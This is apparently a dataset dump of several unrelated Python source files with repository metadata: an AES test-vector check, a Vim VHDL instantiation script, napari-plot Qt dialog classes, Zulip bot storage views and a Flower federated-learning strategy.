'CIPHERTEXT': '459264f4798f6a78bacb89c15ed3d601', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 6, 'PLAINTEXT': '58c8e00b2631686d54eab84b91f0aca1', 'CIPHERTEXT': '08a4e2efec8a8e3312ca7460b9040bbf', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}], 'ENCRYPT': [{'COUNT': 0, 'PLAINTEXT': 'f34481ec3cc627bacd5dc3fb08f273e6', 'CIPHERTEXT': '0336763e966d92595a567cc9ce537f5e', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 1, 'PLAINTEXT': '9798c4640bad75c7c3227db910174e72', 'CIPHERTEXT': 'a9a1631bf4996954ebc093957b234589', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 2, 'PLAINTEXT': '96ab5c2ff612d9dfaae8c31f30c42168', 'CIPHERTEXT': 'ff4f8391a6a40ca5b25d23bedd44a597', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 3, 'PLAINTEXT': '6a118a874519e64e9963798a503f1d35', 'CIPHERTEXT': 'dc43be40be0e53712f7e2bf5ca707209', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 4, 'PLAINTEXT': 'cb9fceec81286ca3e989bd979b0cb284', 'CIPHERTEXT': '92beedab1895a94faa69b632e5cc47ce', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 5, 'PLAINTEXT': 'b26aeb1874e47ca8358ff22378f09144', 'CIPHERTEXT': '459264f4798f6a78bacb89c15ed3d601', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 6, 'PLAINTEXT': '58c8e00b2631686d54eab84b91f0aca1', 'CIPHERTEXT': '08a4e2efec8a8e3312ca7460b9040bbf', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}]}
expected_str_val = json.dumps(expected, sort_keys=True)
expected_hash_val = hashlib.sha1(expected_str_val).hexdigest()
actual_str_val = json.dumps(utils.parse_rsp_str(test_data), sort_keys=True)
actual_hash_val = hashlib.sha1(actual_str_val).hexdigest()
assert expected_hash_val == actual_hash_val
| 4,228 | 0 | 92 |
abe44a7ba7d6b23e2e69483c0c5df6ed944c52b3 | 14,694 | py | Python | plugin/instVHDL.py | B00Ze/instVhdl | e359035dc6a17f82ae109571a8bf07760911b4ef | [
"BSD-3-Clause"
] | 1 | 2021-03-21T16:14:49.000Z | 2021-03-21T16:14:49.000Z | plugin/instVHDL.py | B00Ze/instVhdl | e359035dc6a17f82ae109571a8bf07760911b4ef | [
"BSD-3-Clause"
] | 3 | 2017-06-13T10:26:47.000Z | 2017-09-12T15:41:41.000Z | plugin/instVHDL.py | B00Ze/instVhdl | e359035dc6a17f82ae109571a8bf07760911b4ef | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# -----------------------------------------------------------------------------
# Name: VHDL instantiation script
# Purpose: Using with VIM
#
# Author: BooZe
#
# Created: 25.03.2013
# Copyright: (c) BooZe 2013
# Licence: BSD
# -----------------------------------------------------------------------------
import re
import sys
if __name__ == "__main__":
command_line_interface(sys.argv)
| 33.77931 | 79 | 0.56717 | #!/usr/bin/python
# -----------------------------------------------------------------------------
# Name: VHDL instantiation script
# Purpose: Using with VIM
#
# Author: BooZe
#
# Created: 25.03.2013
# Copyright: (c) BooZe 2013
# Licence: BSD
# -----------------------------------------------------------------------------
import re
import sys
class port(object):
def __init__(self, portName, portType):
self.portName = portName
self.portType = portType
def getName(self):
return self.portName
def getType(self):
return self.portType
def setName(self, portName):
self.portName = portName
def setType(self, portType):
self.portType = portType
class genericPort(port):
def __init__(self, portName, portType, defaultValue):
port.__init__(self, portName, portType)
self.defaultValue = defaultValue
def getDefault(self):
return self.defaultValue
def setDefault(self, defaultValue):
self.defaultValue = defaultValue
class genericPortVHDL(genericPort):
def __init__(self, portName, portType, defaultValue):
genericPort.__init__(self, portName, portType, defaultValue)
self.defaultValue = defaultValue
def getStrAligned(self, nameMax):
nameLen = len(self.getName())
strDefault = self.getDefault()
if strDefault != "":
strDefault = " := "+strDefault
return [self.getName()+" "*(nameMax-nameLen)+" : "+self.getType() +
strDefault+";"]
def getStrList(self):
return [self.getName()+" : "+self.getType()+";"]
class inoutPort(port):
def __init__(self, portName, portType, inoutType):
port.__init__(self, portName, portType)
self.inoutType = inoutType
def getInout(self):
return self.inoutType
def setInout(self, inoutType):
self.inoutType = inoutType
class inoutPortVHDL(inoutPort):
def __init__(self, portName, portType, inoutType):
inoutPort.__init__(self, portName, portType, inoutType)
self.inoutType = inoutType
def getStrAligned(self, nameMax, inoutMax):
nameLen = len(self.getName())
inoutLen = len(self.getInout())
return [self.getName()+" "*(nameMax-nameLen)+" : "+self.getInout() +
" "*(inoutMax-inoutLen)+' '+self.getType()+";"]
def getStrList(self):
return [self.getName()+" : "+self.getType()+";"]
class component(object):
def __init__(self, name):
self.name = name
self.lib = "Default_lib"
self.genericList = []
self.inoutList = []
self.portMaxLen = 0
self.inoutMaxLen = 0
def getName(self):
return self.name
def setName(self, name):
self.name = name
def getLib(self):
return self.lib
def setLib(self, lib):
self.lib = lib
def addGeneric(self, genericPort):
strLen = len(genericPort.getName())
if strLen > self.portMaxLen:
self.portMaxLen = strLen
self.genericList.append(genericPort)
def addGenericStr(self, portName, portType, defaultValue):
tmp = genericPort(portName, portType, defaultValue)
strLen = len(portName)
if strLen > self.portMaxLen:
self.portMaxLen = strLen
self.genericList.append(tmp)
def setGeneric(self, genericList):
for inout in genericList:
strNameLen = len(genericList.getName())
if strNameLen > self.portMaxLen:
self.portMaxLen = strNameLen
self.genericList = genericList
def getGeneric(self):
return self.genericList
def addInoutStr(self, portName, portType, inoutType):
strNameLen = len(portName)
if strNameLen > self.portMaxLen:
self.portMaxLen = strNameLen
strInoutLen = len(inoutType)
if strInoutLen > self.inoutMaxLen:
self.inoutMaxLen = strInoutLen
tmp = inoutPortVHDL(portName, portType, inoutType)
self.inoutList.append(tmp)
class componentVHDL(component):
def addGenericStr(self, portName, portType, defaultValue):
tmp = genericPortVHDL(portName, portType, defaultValue)
strLen = len(portName)
if strLen > self.portMaxLen:
self.portMaxLen = strLen
self.genericList.append(tmp)
def getStrGeneric(self):
listOut = []
if (self.genericList != []):
listOut.append("\tgeneric (\n")
for gen in self.getGeneric():
for strAl in gen.getStrAligned(self.portMaxLen):
listOut.append("\t\t"+strAl+"\n")
listOut[-1] = listOut[-1][:-2]+"\n"
listOut.append("\t);\n")
return listOut
def getStrEntity(self):
listOut = ["\tport (\n"]
for port in self.inoutList:
for strAl in port.getStrAligned(self.portMaxLen, self.inoutMaxLen):
listOut.append("\t\t"+strAl+"\n")
listOut[-1] = listOut[-1][:-2]+"\n"
listOut.append("\t);\n")
return listOut
def getStrUse(self):
return ["\tFOR ALL : "+self.getName()+" USE ENTITY "+self.getLib() +
"."+self.getName()+";\n"]
def getStrMap(self):
strOut = ["\t"+self.getName()+"0 : "+self.getName()+"\n"]
if self.genericList != []:
strOut += ["\t\tgeneric map (\n"]
for gen in self.genericList:
genNameLen = len(gen.getName())
strOut += ["\t\t\t"+gen.getName() +
" "*(self.portMaxLen-genNameLen) +
" => "+gen.getName()+",\n"]
strOut[-1] = strOut[-1][:-2]+"\n"
strOut += ["\t\t)\n"]
strOut += ["\t\tport map(\n"]
for inout in self.inoutList:
inoutNameLen = len(inout.getName())
strOut += ["\t\t\t"+inout.getName() +
" "*(self.portMaxLen-inoutNameLen) +
" => "+inout.getName()+",\n"]
strOut[-1] = strOut[-1][:-2]+"\n"
strOut += ["\t\t);\n"]
return strOut
def getStrLib(self):
return ["LIBRARY "+self.getLib()+";\n"]
def getStrComponent(self):
strOut = ["component "+self.getName()+"\n"]
strOut += self.getStrGeneric()
strOut += self.getStrEntity()
strOut += ["end component;\n"]
for ind in range(len(strOut)):
strOut[ind] = "\t"+strOut[ind]
return strOut
def parseLib(self, fileName):
import os
separator = os.path.sep
if separator == '\\':
separator = r'\\'
libRe = separator + r"[\w]+_lib" + separator
libName = re.compile(libRe, re.I)
resLib = libName.search(fileName)
if resLib is not None:
self.setLib(resLib.group()[1:-1])
else:
self.setLib("SomeLib")
def parseGenerics(self, genericStr):
openParPlace = genericStr.find("(")
closeParPlace = genericStr.rfind(")")
# Checking for empty generics list
if (openParPlace == -1 or closeParPlace == -1):
return
genericContent = genericStr[openParPlace+1:closeParPlace]
# Generic list creation
genericList = genericContent.split(";")
for gen in genericList:
partLst = gen.split(":")
# First - parameter name, second - type, last - default value
if len(partLst) > 1:
parName = partLst[0].strip(" ")
parType = partLst[1].strip(" ")
if len(partLst) == 3:
parDefVal = partLst[2]
# Removing = sign
parDefVal = parDefVal.strip("=")
parDefVal = parDefVal.strip(" ")
else:
parDefVal = ""
self.addGenericStr(parName, parType, parDefVal)
def parsePorts(self, portString):
openParPlace = portString.find("(")
closeParPlace = portString.rfind(")")
# Checking for empty port list
if (openParPlace == -1 or closeParPlace == -1):
return
genericContent = portString[openParPlace+1:closeParPlace]
# Generic list creation
genericList = genericContent.split(";")
for gen in genericList:
partLst = gen.split(":")
# First - port name, second - type with inout type
if len(partLst) > 1:
portName = partLst[0].strip()
typeWords = partLst[1].split()
portInout = typeWords[0]
portType = " ".join(typeWords[1:])
self.addInoutStr(portName, portType, portInout)
def parseEntity(self, entityFile):
entityStr = ""
with open(entityFile, "r") as f:
# Entity begining searching
entNameRE = re.compile(r"(?<=entity)[ \t]+[\w]+[ \t]+(?=is)", re.I)
entName = None
line = None
while (entName is None and line != ""):
line = f.readline()
entName = entNameRE.search(line)
if entName is None:
self.name = "someEnt"
else:
self.name = entName.group().strip()
# Entity end searching
entEndER = re.compile(r"\bend\b", re.I)
entEnd = None
while(entEnd is None and line != ""):
line = f.readline()
# Comment removing
commentBeg = line.find("--")
lineSearch = line[:commentBeg]
entEnd = entEndER.search(lineSearch)
if (entEnd is None):
# Adding to entity string
entityStr += lineSearch
portRE = re.compile(r"\bport\b", re.I)
entSplit = portRE.split(entityStr)
# Parsing of generic and port list
if (len(entSplit) == 2):
self.parseGenerics(entSplit[0])
self.parsePorts(entSplit[1])
elif (len(entSplit) == 1):
self.parsePorts(entSplit[0])
def parseFile(self, fileName):
# Getting library
self.parseLib(fileName)
# Getting entity content
self.parseEntity(fileName)
class EntityInstantiator():
def __init__(self):
self.libRe = re.compile(r"(?<=library)[\w \t]+", re.I)
self.compRe = re.compile(r"end[\t ]+component", re.I)
self.useRe = re.compile(r"USE[ \t]+ENTITY", re.I)
self.archRe = re.compile(r"begin", re.I)
self.libExist = False
self.libLine = -1
self.archLine = -1
self.compLine = -1
self.useLine = -1
self._currBuffer = []
def parseSourceFile(self, sourceFileName):
self.sourceInst = componentVHDL("")
self.sourceInst.parseFile(sourceFileName)
def parseTargetFile(self, destinationFileName):
with open(destinationFileName, "r+") as buffFile:
self._currBuffer = buffFile.readlines()
for i in range(len(self._currBuffer)):
line = self._currBuffer[i]
resLib = self.libRe.search(line)
if resLib is not None:
self.libLine = i
lib = resLib.group()
lib = lib.strip()
if lib.lower() == self.sourceInst.getLib().lower():
self.libExist = True
resComp = self.compRe.search(line)
if resComp is not None:
self.compLine = i
useComp = self.useRe.search(line)
if useComp is not None:
self.useLine = i
resArch = self.archRe.match(line)
if resArch is not None:
self.archLine = i
break
def _mergeLibraryDeclaration(self):
if (self.libLine >= 0) and not(self.libExist):
self._mergeBuff += self._currBuffer[:self.libLine+1]
self._mergeBuff += self.sourceInst.getStrLib()
self.strPtr = self.libLine+1
def _mergeComponentDeclaration(self):
if self.compLine >= 0:
self._mergeBuff += self._currBuffer[self.strPtr:self.compLine+1]
self._mergeBuff += self.sourceInst.getStrComponent()
self.strPtr = self.compLine+1
elif self.archLine >= 0:
self._mergeBuff += self._currBuffer[self.strPtr:self.archLine]
self._mergeBuff += self.sourceInst.getStrComponent()
self.strPtr = self.archLine
def _mergeComponentMap(self):
if self.useLine >= 0:
self._mergeBuff += self._currBuffer[self.strPtr:self.useLine+1]
self._mergeBuff += self.sourceInst.getStrUse()
self.strPtr = self.useLine+1
elif self.archLine >= 0:
self._mergeBuff += self._currBuffer[self.strPtr:self.archLine]
self._mergeBuff += self.sourceInst.getStrUse()
self.strPtr = self.archLine
def _mergeBlockInstance(self, currLine):
if currLine >= 0:
self._mergeBuff += self._currBuffer[self.strPtr:currLine-1]
self._mergeBuff += self.sourceInst.getStrMap()
self.strPtr = currLine-1
def _mergeTargetTail(self):
self._mergeBuff += self._currBuffer[self.strPtr:]
def mergeSourceTarget(self, currLine):
self._mergeBuff = []
self.strPtr = 0
self._mergeLibraryDeclaration()
self._mergeComponentDeclaration()
self._mergeComponentMap()
self._mergeBlockInstance(currLine)
self._mergeTargetTail()
strOut = ''.join(self._mergeBuff)
return strOut
def instantiate(self, entityFileName, bufferFileName, currLine):
self.parseSourceFile(entityFileName)
self.parseTargetFile(bufferFileName)
strOut = self.mergeSourceTarget(currLine)
with open(bufferFileName, "rb+") as file:
file.write(bytearray(strOut.encode('UTF-8')))
def instantiateEntityVHDL(entityFileName, bufferFileName, currLine):
instantiator = EntityInstantiator()
instantiator.instantiate(entityFileName, bufferFileName, currLine)
def instantiateEntity(entityFileName, bufferFileName, currLine):
if entityFileName[-4:] == '.vhd':
instantiateEntityVHDL(entityFileName, bufferFileName, currLine)
def command_line_interface(cmd_args):
strUsing = """Usage of script:
python instVHDL.py input_file output_file str_num
"""
if len(cmd_args) != 4:
print(strUsing)
sys.exit(2)
instantiateEntity(cmd_args[1], cmd_args[2], int(cmd_args[3]))
if __name__ == "__main__":
command_line_interface(sys.argv)
| 12,634 | 45 | 1,570 |
27a4b454c13017dbad93e43670f4dc71e0bcd006 | 6,576 | py | Python | napari_plot/_qt/qt_dialog.py | lukasz-migas/napari-1d | b0f081a8711ae941b3e4b5c58c3aea56bd0e3277 | [
"BSD-3-Clause"
] | 13 | 2021-08-27T23:01:09.000Z | 2022-03-22T13:51:35.000Z | napari_plot/_qt/qt_dialog.py | lukasz-migas/napari-1d | b0f081a8711ae941b3e4b5c58c3aea56bd0e3277 | [
"BSD-3-Clause"
] | 71 | 2021-08-28T13:29:17.000Z | 2022-03-28T21:22:12.000Z | napari_plot/_qt/qt_dialog.py | lukasz-migas/napari-1d | b0f081a8711ae941b3e4b5c58c3aea56bd0e3277 | [
"BSD-3-Clause"
] | null | null | null | from qtpy.QtCore import QPoint, Qt
from qtpy.QtGui import QCursor
from qtpy.QtWidgets import QApplication, QDialog, QHBoxLayout, QLayout, QWidget
from . import helpers as hp
class QtDialog(QDialog):
"""Dialog base class"""
_icons = None
_main_layout = None
def on_close(self):
"""Close window"""
self.close()
def _on_teardown(self):
"""Execute just before deletion"""
def closeEvent(self, event):
"""Close event"""
self._on_teardown()
return super().closeEvent(event)
def make_panel(self) -> QLayout:
"""Make panel"""
...
def make_gui(self):
"""Make and arrange main panel"""
# make panel
layout = self.make_panel()
if layout is None:
raise ValueError("Expected layout")
# pack element
self.setLayout(layout)
self._main_layout = layout
def show_above_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() / 2, sz_hint.height() + y_offset)
self.move(pos)
if show:
self.show()
def show_above_mouse(self, show: bool = True):
"""Show popup dialog above the mouse cursor position."""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() / 2, sz_hint.height() + 14)
self.move(pos)
if show:
self.show()
def show_below_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() / 2, -y_offset)
self.move(pos)
if show:
self.show()
def show_below_mouse(self, show: bool = True):
"""Show popup dialog above the mouse cursor position."""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() / 2, -14)
self.move(pos)
if show:
self.show()
def show_right_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(-x_offset, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_right_of_mouse(self, show: bool = True):
"""Show popup dialog on the right hand side of the mouse cursor position"""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(-14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_left_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left(), rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() + 14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_left_of_mouse(self, show: bool = True):
"""Show popup dialog on the left hand side of the mouse cursor position"""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() + 14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
class QtFramelessPopup(QtDialog):
"""Frameless dialog"""
# attributes used to move windows around
_old_window_pos, _move_handle = None, None
def _make_move_handle(self) -> QHBoxLayout:
"""Make handle button that helps move the window around"""
self._move_handle = hp.make_qta_label(
self,
"move",
tooltip="Click here and drag the mouse around to move the window.",
)
self._move_handle.setCursor(Qt.PointingHandCursor)
layout = QHBoxLayout()
layout.addStretch(1)
layout.addWidget(self._move_handle)
return layout
def mousePressEvent(self, event):
"""mouse press event"""
super().mousePressEvent(event)
# allow movement of the window when user uses right-click and the move handle button does not exist
if event.button() == Qt.RightButton and self._move_handle is None:
self._old_window_pos = event.x(), event.y()
elif self._move_handle is None:
self._old_window_pos = None
elif self.childAt(event.pos()) == self._move_handle:
self._old_window_pos = event.x(), event.y()
def mouseMoveEvent(self, event):
"""Mouse move event - ensures its possible to move the window to new location"""
super().mouseMoveEvent(event)
if self._old_window_pos is not None:
self.move(
event.globalX() - self._old_window_pos[0],
event.globalY() - self._old_window_pos[1],
) # noqa
def mouseReleaseEvent(self, event):
"""mouse release event"""
super().mouseReleaseEvent(event)
self._old_window_pos = None
class QtFramelessTool(QtFramelessPopup):
"""Frameless dialog that stays on top"""
| 33.55102 | 107 | 0.594891 | from qtpy.QtCore import QPoint, Qt
from qtpy.QtGui import QCursor
from qtpy.QtWidgets import QApplication, QDialog, QHBoxLayout, QLayout, QWidget
from . import helpers as hp
class QtDialog(QDialog):
"""Dialog base class"""
_icons = None
_main_layout = None
def __init__(self, parent=None, title: str = "Dialog"):
QDialog.__init__(self, parent)
self._parent = parent
self.setWindowTitle(QApplication.translate(str(self), title, None, -1))
self.setAttribute(Qt.WA_DeleteOnClose)
self.make_gui()
def on_close(self):
"""Close window"""
self.close()
def _on_teardown(self):
"""Execute just before deletion"""
def closeEvent(self, event):
"""Close event"""
self._on_teardown()
return super().closeEvent(event)
def make_panel(self) -> QLayout:
"""Make panel"""
...
def make_gui(self):
"""Make and arrange main panel"""
# make panel
layout = self.make_panel()
if layout is None:
raise ValueError("Expected layout")
# pack element
self.setLayout(layout)
self._main_layout = layout
def show_above_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() / 2, sz_hint.height() + y_offset)
self.move(pos)
if show:
self.show()
def show_above_mouse(self, show: bool = True):
"""Show popup dialog above the mouse cursor position."""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() / 2, sz_hint.height() + 14)
self.move(pos)
if show:
self.show()
def show_below_widget(self, widget: QWidget, show: bool = True, y_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() / 2, -y_offset)
self.move(pos)
if show:
self.show()
def show_below_mouse(self, show: bool = True):
"""Show popup dialog above the mouse cursor position."""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() / 2, -14)
self.move(pos)
if show:
self.show()
def show_right_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left() + rect.width() / 2, rect.top()))
sz_hint = self.size()
pos -= QPoint(-x_offset, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_right_of_mouse(self, show: bool = True):
"""Show popup dialog on the right hand side of the mouse cursor position"""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(-14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_left_of_widget(self, widget: QWidget, show: bool = True, x_offset: int = 14):
"""Show popup dialog above the widget"""
rect = widget.rect()
pos = widget.mapToGlobal(QPoint(rect.left(), rect.top()))
sz_hint = self.size()
pos -= QPoint(sz_hint.width() + 14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
def show_left_of_mouse(self, show: bool = True):
"""Show popup dialog on the left hand side of the mouse cursor position"""
pos = QCursor().pos() # mouse position
sz_hint = self.sizeHint()
pos -= QPoint(sz_hint.width() + 14, sz_hint.height() / 4)
self.move(pos)
if show:
self.show()
class QtFramelessPopup(QtDialog):
"""Frameless dialog"""
# attributes used to move windows around
_old_window_pos, _move_handle = None, None
def __init__(
self,
parent,
title="",
position=None,
flags=Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint | Qt.Popup,
):
super().__init__(parent, title)
self.setAttribute(Qt.WA_DeleteOnClose)
self.setAttribute(Qt.WA_ShowWithoutActivating)
self.setWindowFlags(flags)
if position is not None:
self.move(position)
def _make_move_handle(self) -> QHBoxLayout:
"""Make handle button that helps move the window around"""
self._move_handle = hp.make_qta_label(
self,
"move",
tooltip="Click here and drag the mouse around to move the window.",
)
self._move_handle.setCursor(Qt.PointingHandCursor)
layout = QHBoxLayout()
layout.addStretch(1)
layout.addWidget(self._move_handle)
return layout
def mousePressEvent(self, event):
"""mouse press event"""
super().mousePressEvent(event)
# allow movement of the window when user uses right-click and the move handle button does not exist
if event.button() == Qt.RightButton and self._move_handle is None:
self._old_window_pos = event.x(), event.y()
elif self._move_handle is None:
self._old_window_pos = None
elif self.childAt(event.pos()) == self._move_handle:
self._old_window_pos = event.x(), event.y()
def mouseMoveEvent(self, event):
"""Mouse move event - ensures its possible to move the window to new location"""
super().mouseMoveEvent(event)
if self._old_window_pos is not None:
self.move(
event.globalX() - self._old_window_pos[0],
event.globalY() - self._old_window_pos[1],
) # noqa
def mouseReleaseEvent(self, event):
"""mouse release event"""
super().mouseReleaseEvent(event)
self._old_window_pos = None
class QtFramelessTool(QtFramelessPopup):
"""Frameless dialog that stays on top"""
def __init__(
self,
parent,
title: str = "",
position=None,
flags=Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint | Qt.Tool,
):
super().__init__(parent, title, position, flags)
| 849 | 0 | 81 |
b5e71b4f7c95803d854afa2f0cfa1afffd4452f2 | 360 | py | Python | HackerRank/python/list_compre.py | tuvshinot/algorithm-sorting-DS | 784c2338fb92f9d2f4da6294f242563031a09c4c | [
"MIT"
] | null | null | null | HackerRank/python/list_compre.py | tuvshinot/algorithm-sorting-DS | 784c2338fb92f9d2f4da6294f242563031a09c4c | [
"MIT"
] | null | null | null | HackerRank/python/list_compre.py | tuvshinot/algorithm-sorting-DS | 784c2338fb92f9d2f4da6294f242563031a09c4c | [
"MIT"
] | null | null | null | x = 2
y = 2
n = 2
# ar = []
# p = 0
# for i in range ( x + 1 ) :
# for j in range( y + 1):
# if i+j != n:
# ar.append([])
# ar[p] = [ i , j ]
# p+=1
# print(ar)
x = 2
y = 2
z = 2
n = 2
lst = [[i, j, k] for i in range(x + 1) for j in range(y + 1) for k in range(z + 1) if i + j + k != n]
print(lst) | 15.652174 | 101 | 0.361111 | x = 2
y = 2
n = 2
# ar = []
# p = 0
# for i in range ( x + 1 ) :
# for j in range( y + 1):
# if i+j != n:
# ar.append([])
# ar[p] = [ i , j ]
# p+=1
# print(ar)
x = 2
y = 2
z = 2
n = 2
lst = [[i, j, k] for i in range(x + 1) for j in range(y + 1) for k in range(z + 1) if i + j + k != n]
print(lst) | 0 | 0 | 0 |
9c13acfb96b6fa83f23e449c9539c2406f1c8a35 | 1,832 | py | Python | zerver/views/storage.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 4 | 2021-09-16T16:46:55.000Z | 2022-02-06T13:00:21.000Z | zerver/views/storage.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | null | null | null | zerver/views/storage.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 1 | 2022-01-15T08:36:09.000Z | 2022-01-15T08:36:09.000Z | from typing import Dict, List, Optional
from django.http import HttpRequest, HttpResponse
from zerver.lib.bot_storage import (
StateError,
get_bot_storage,
get_keys_in_bot_storage,
remove_bot_storage,
set_bot_storage,
)
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.validator import check_dict, check_list, check_string
from zerver.models import UserProfile
@has_request_variables
@has_request_variables
@has_request_variables
| 30.533333 | 95 | 0.739629 | from typing import Dict, List, Optional
from django.http import HttpRequest, HttpResponse
from zerver.lib.bot_storage import (
StateError,
get_bot_storage,
get_keys_in_bot_storage,
remove_bot_storage,
set_bot_storage,
)
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.validator import check_dict, check_list, check_string
from zerver.models import UserProfile
@has_request_variables
def update_storage(
request: HttpRequest,
user_profile: UserProfile,
storage: Dict[str, str] = REQ(json_validator=check_dict([], value_validator=check_string)),
) -> HttpResponse:
try:
set_bot_storage(user_profile, list(storage.items()))
except StateError as e: # nocoverage
raise JsonableError(str(e))
return json_success(request)
@has_request_variables
def get_storage(
request: HttpRequest,
user_profile: UserProfile,
keys: Optional[List[str]] = REQ(json_validator=check_list(check_string), default=None),
) -> HttpResponse:
if keys is None:
keys = get_keys_in_bot_storage(user_profile)
try:
storage = {key: get_bot_storage(user_profile, key) for key in keys}
except StateError as e:
raise JsonableError(str(e))
return json_success(request, data={"storage": storage})
@has_request_variables
def remove_storage(
request: HttpRequest,
user_profile: UserProfile,
keys: Optional[List[str]] = REQ(json_validator=check_list(check_string), default=None),
) -> HttpResponse:
if keys is None:
keys = get_keys_in_bot_storage(user_profile)
try:
remove_bot_storage(user_profile, keys)
except StateError as e:
raise JsonableError(str(e))
return json_success(request)
| 1,190 | 0 | 66 |
bcaa254a65f77dc17282d3b1ab843091945002a6 | 3,147 | py | Python | src/flower/strategy/default.py | sishtiaq/flower | e8d57941863dcd193d2c0f4989f3ece5136ce027 | [
"Apache-2.0"
] | null | null | null | src/flower/strategy/default.py | sishtiaq/flower | e8d57941863dcd193d2c0f4989f3ece5136ce027 | [
"Apache-2.0"
] | null | null | null | src/flower/strategy/default.py | sishtiaq/flower | e8d57941863dcd193d2c0f4989f3ece5136ce027 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configurable strategy implementation."""
from typing import Callable, List, Optional, Tuple
from flower.typing import Weights
from .aggregate import aggregate, weighted_loss_avg
from .strategy import Strategy
class DefaultStrategy(Strategy):
"""Configurable default strategy."""
# pylint: disable-msg=too-many-arguments
def __init__(
self,
fraction_fit: float = 0.1,
fraction_eval: float = 0.1,
min_fit_clients: int = 1,
min_eval_clients: int = 1,
min_available_clients: int = 1,
eval_fn: Optional[Callable[[Weights], Optional[Tuple[float, float]]]] = None,
) -> None:
"""Constructor."""
super().__init__()
self.min_fit_clients = min_fit_clients
self.min_eval_clients = min_eval_clients
self.fraction_fit = fraction_fit
self.fraction_eval = fraction_eval
self.min_available_clients = min_available_clients
self.eval_fn = eval_fn
def should_evaluate(self) -> bool:
"""Evaluate every round."""
return self.eval_fn is None
def num_fit_clients(self, num_available_clients: int) -> Tuple[int, int]:
"""Use a fraction of available clients for training."""
num_clients = int(num_available_clients * self.fraction_fit)
return max(num_clients, self.min_fit_clients), self.min_available_clients
def num_evaluation_clients(self, num_available_clients: int) -> Tuple[int, int]:
"""Use a fraction of available clients for evaluation."""
num_clients = int(num_available_clients * self.fraction_eval)
return max(num_clients, self.min_eval_clients), self.min_available_clients
def evaluate(self, weights: Weights) -> Optional[Tuple[float, float]]:
"""Evaluate model weights using an evaluation function (if provided)."""
if self.eval_fn is None:
# No evaluation function provided
return None
return self.eval_fn(weights)
def on_aggregate_fit(
self, results: List[Tuple[Weights, int]], failures: List[BaseException]
) -> Optional[Weights]:
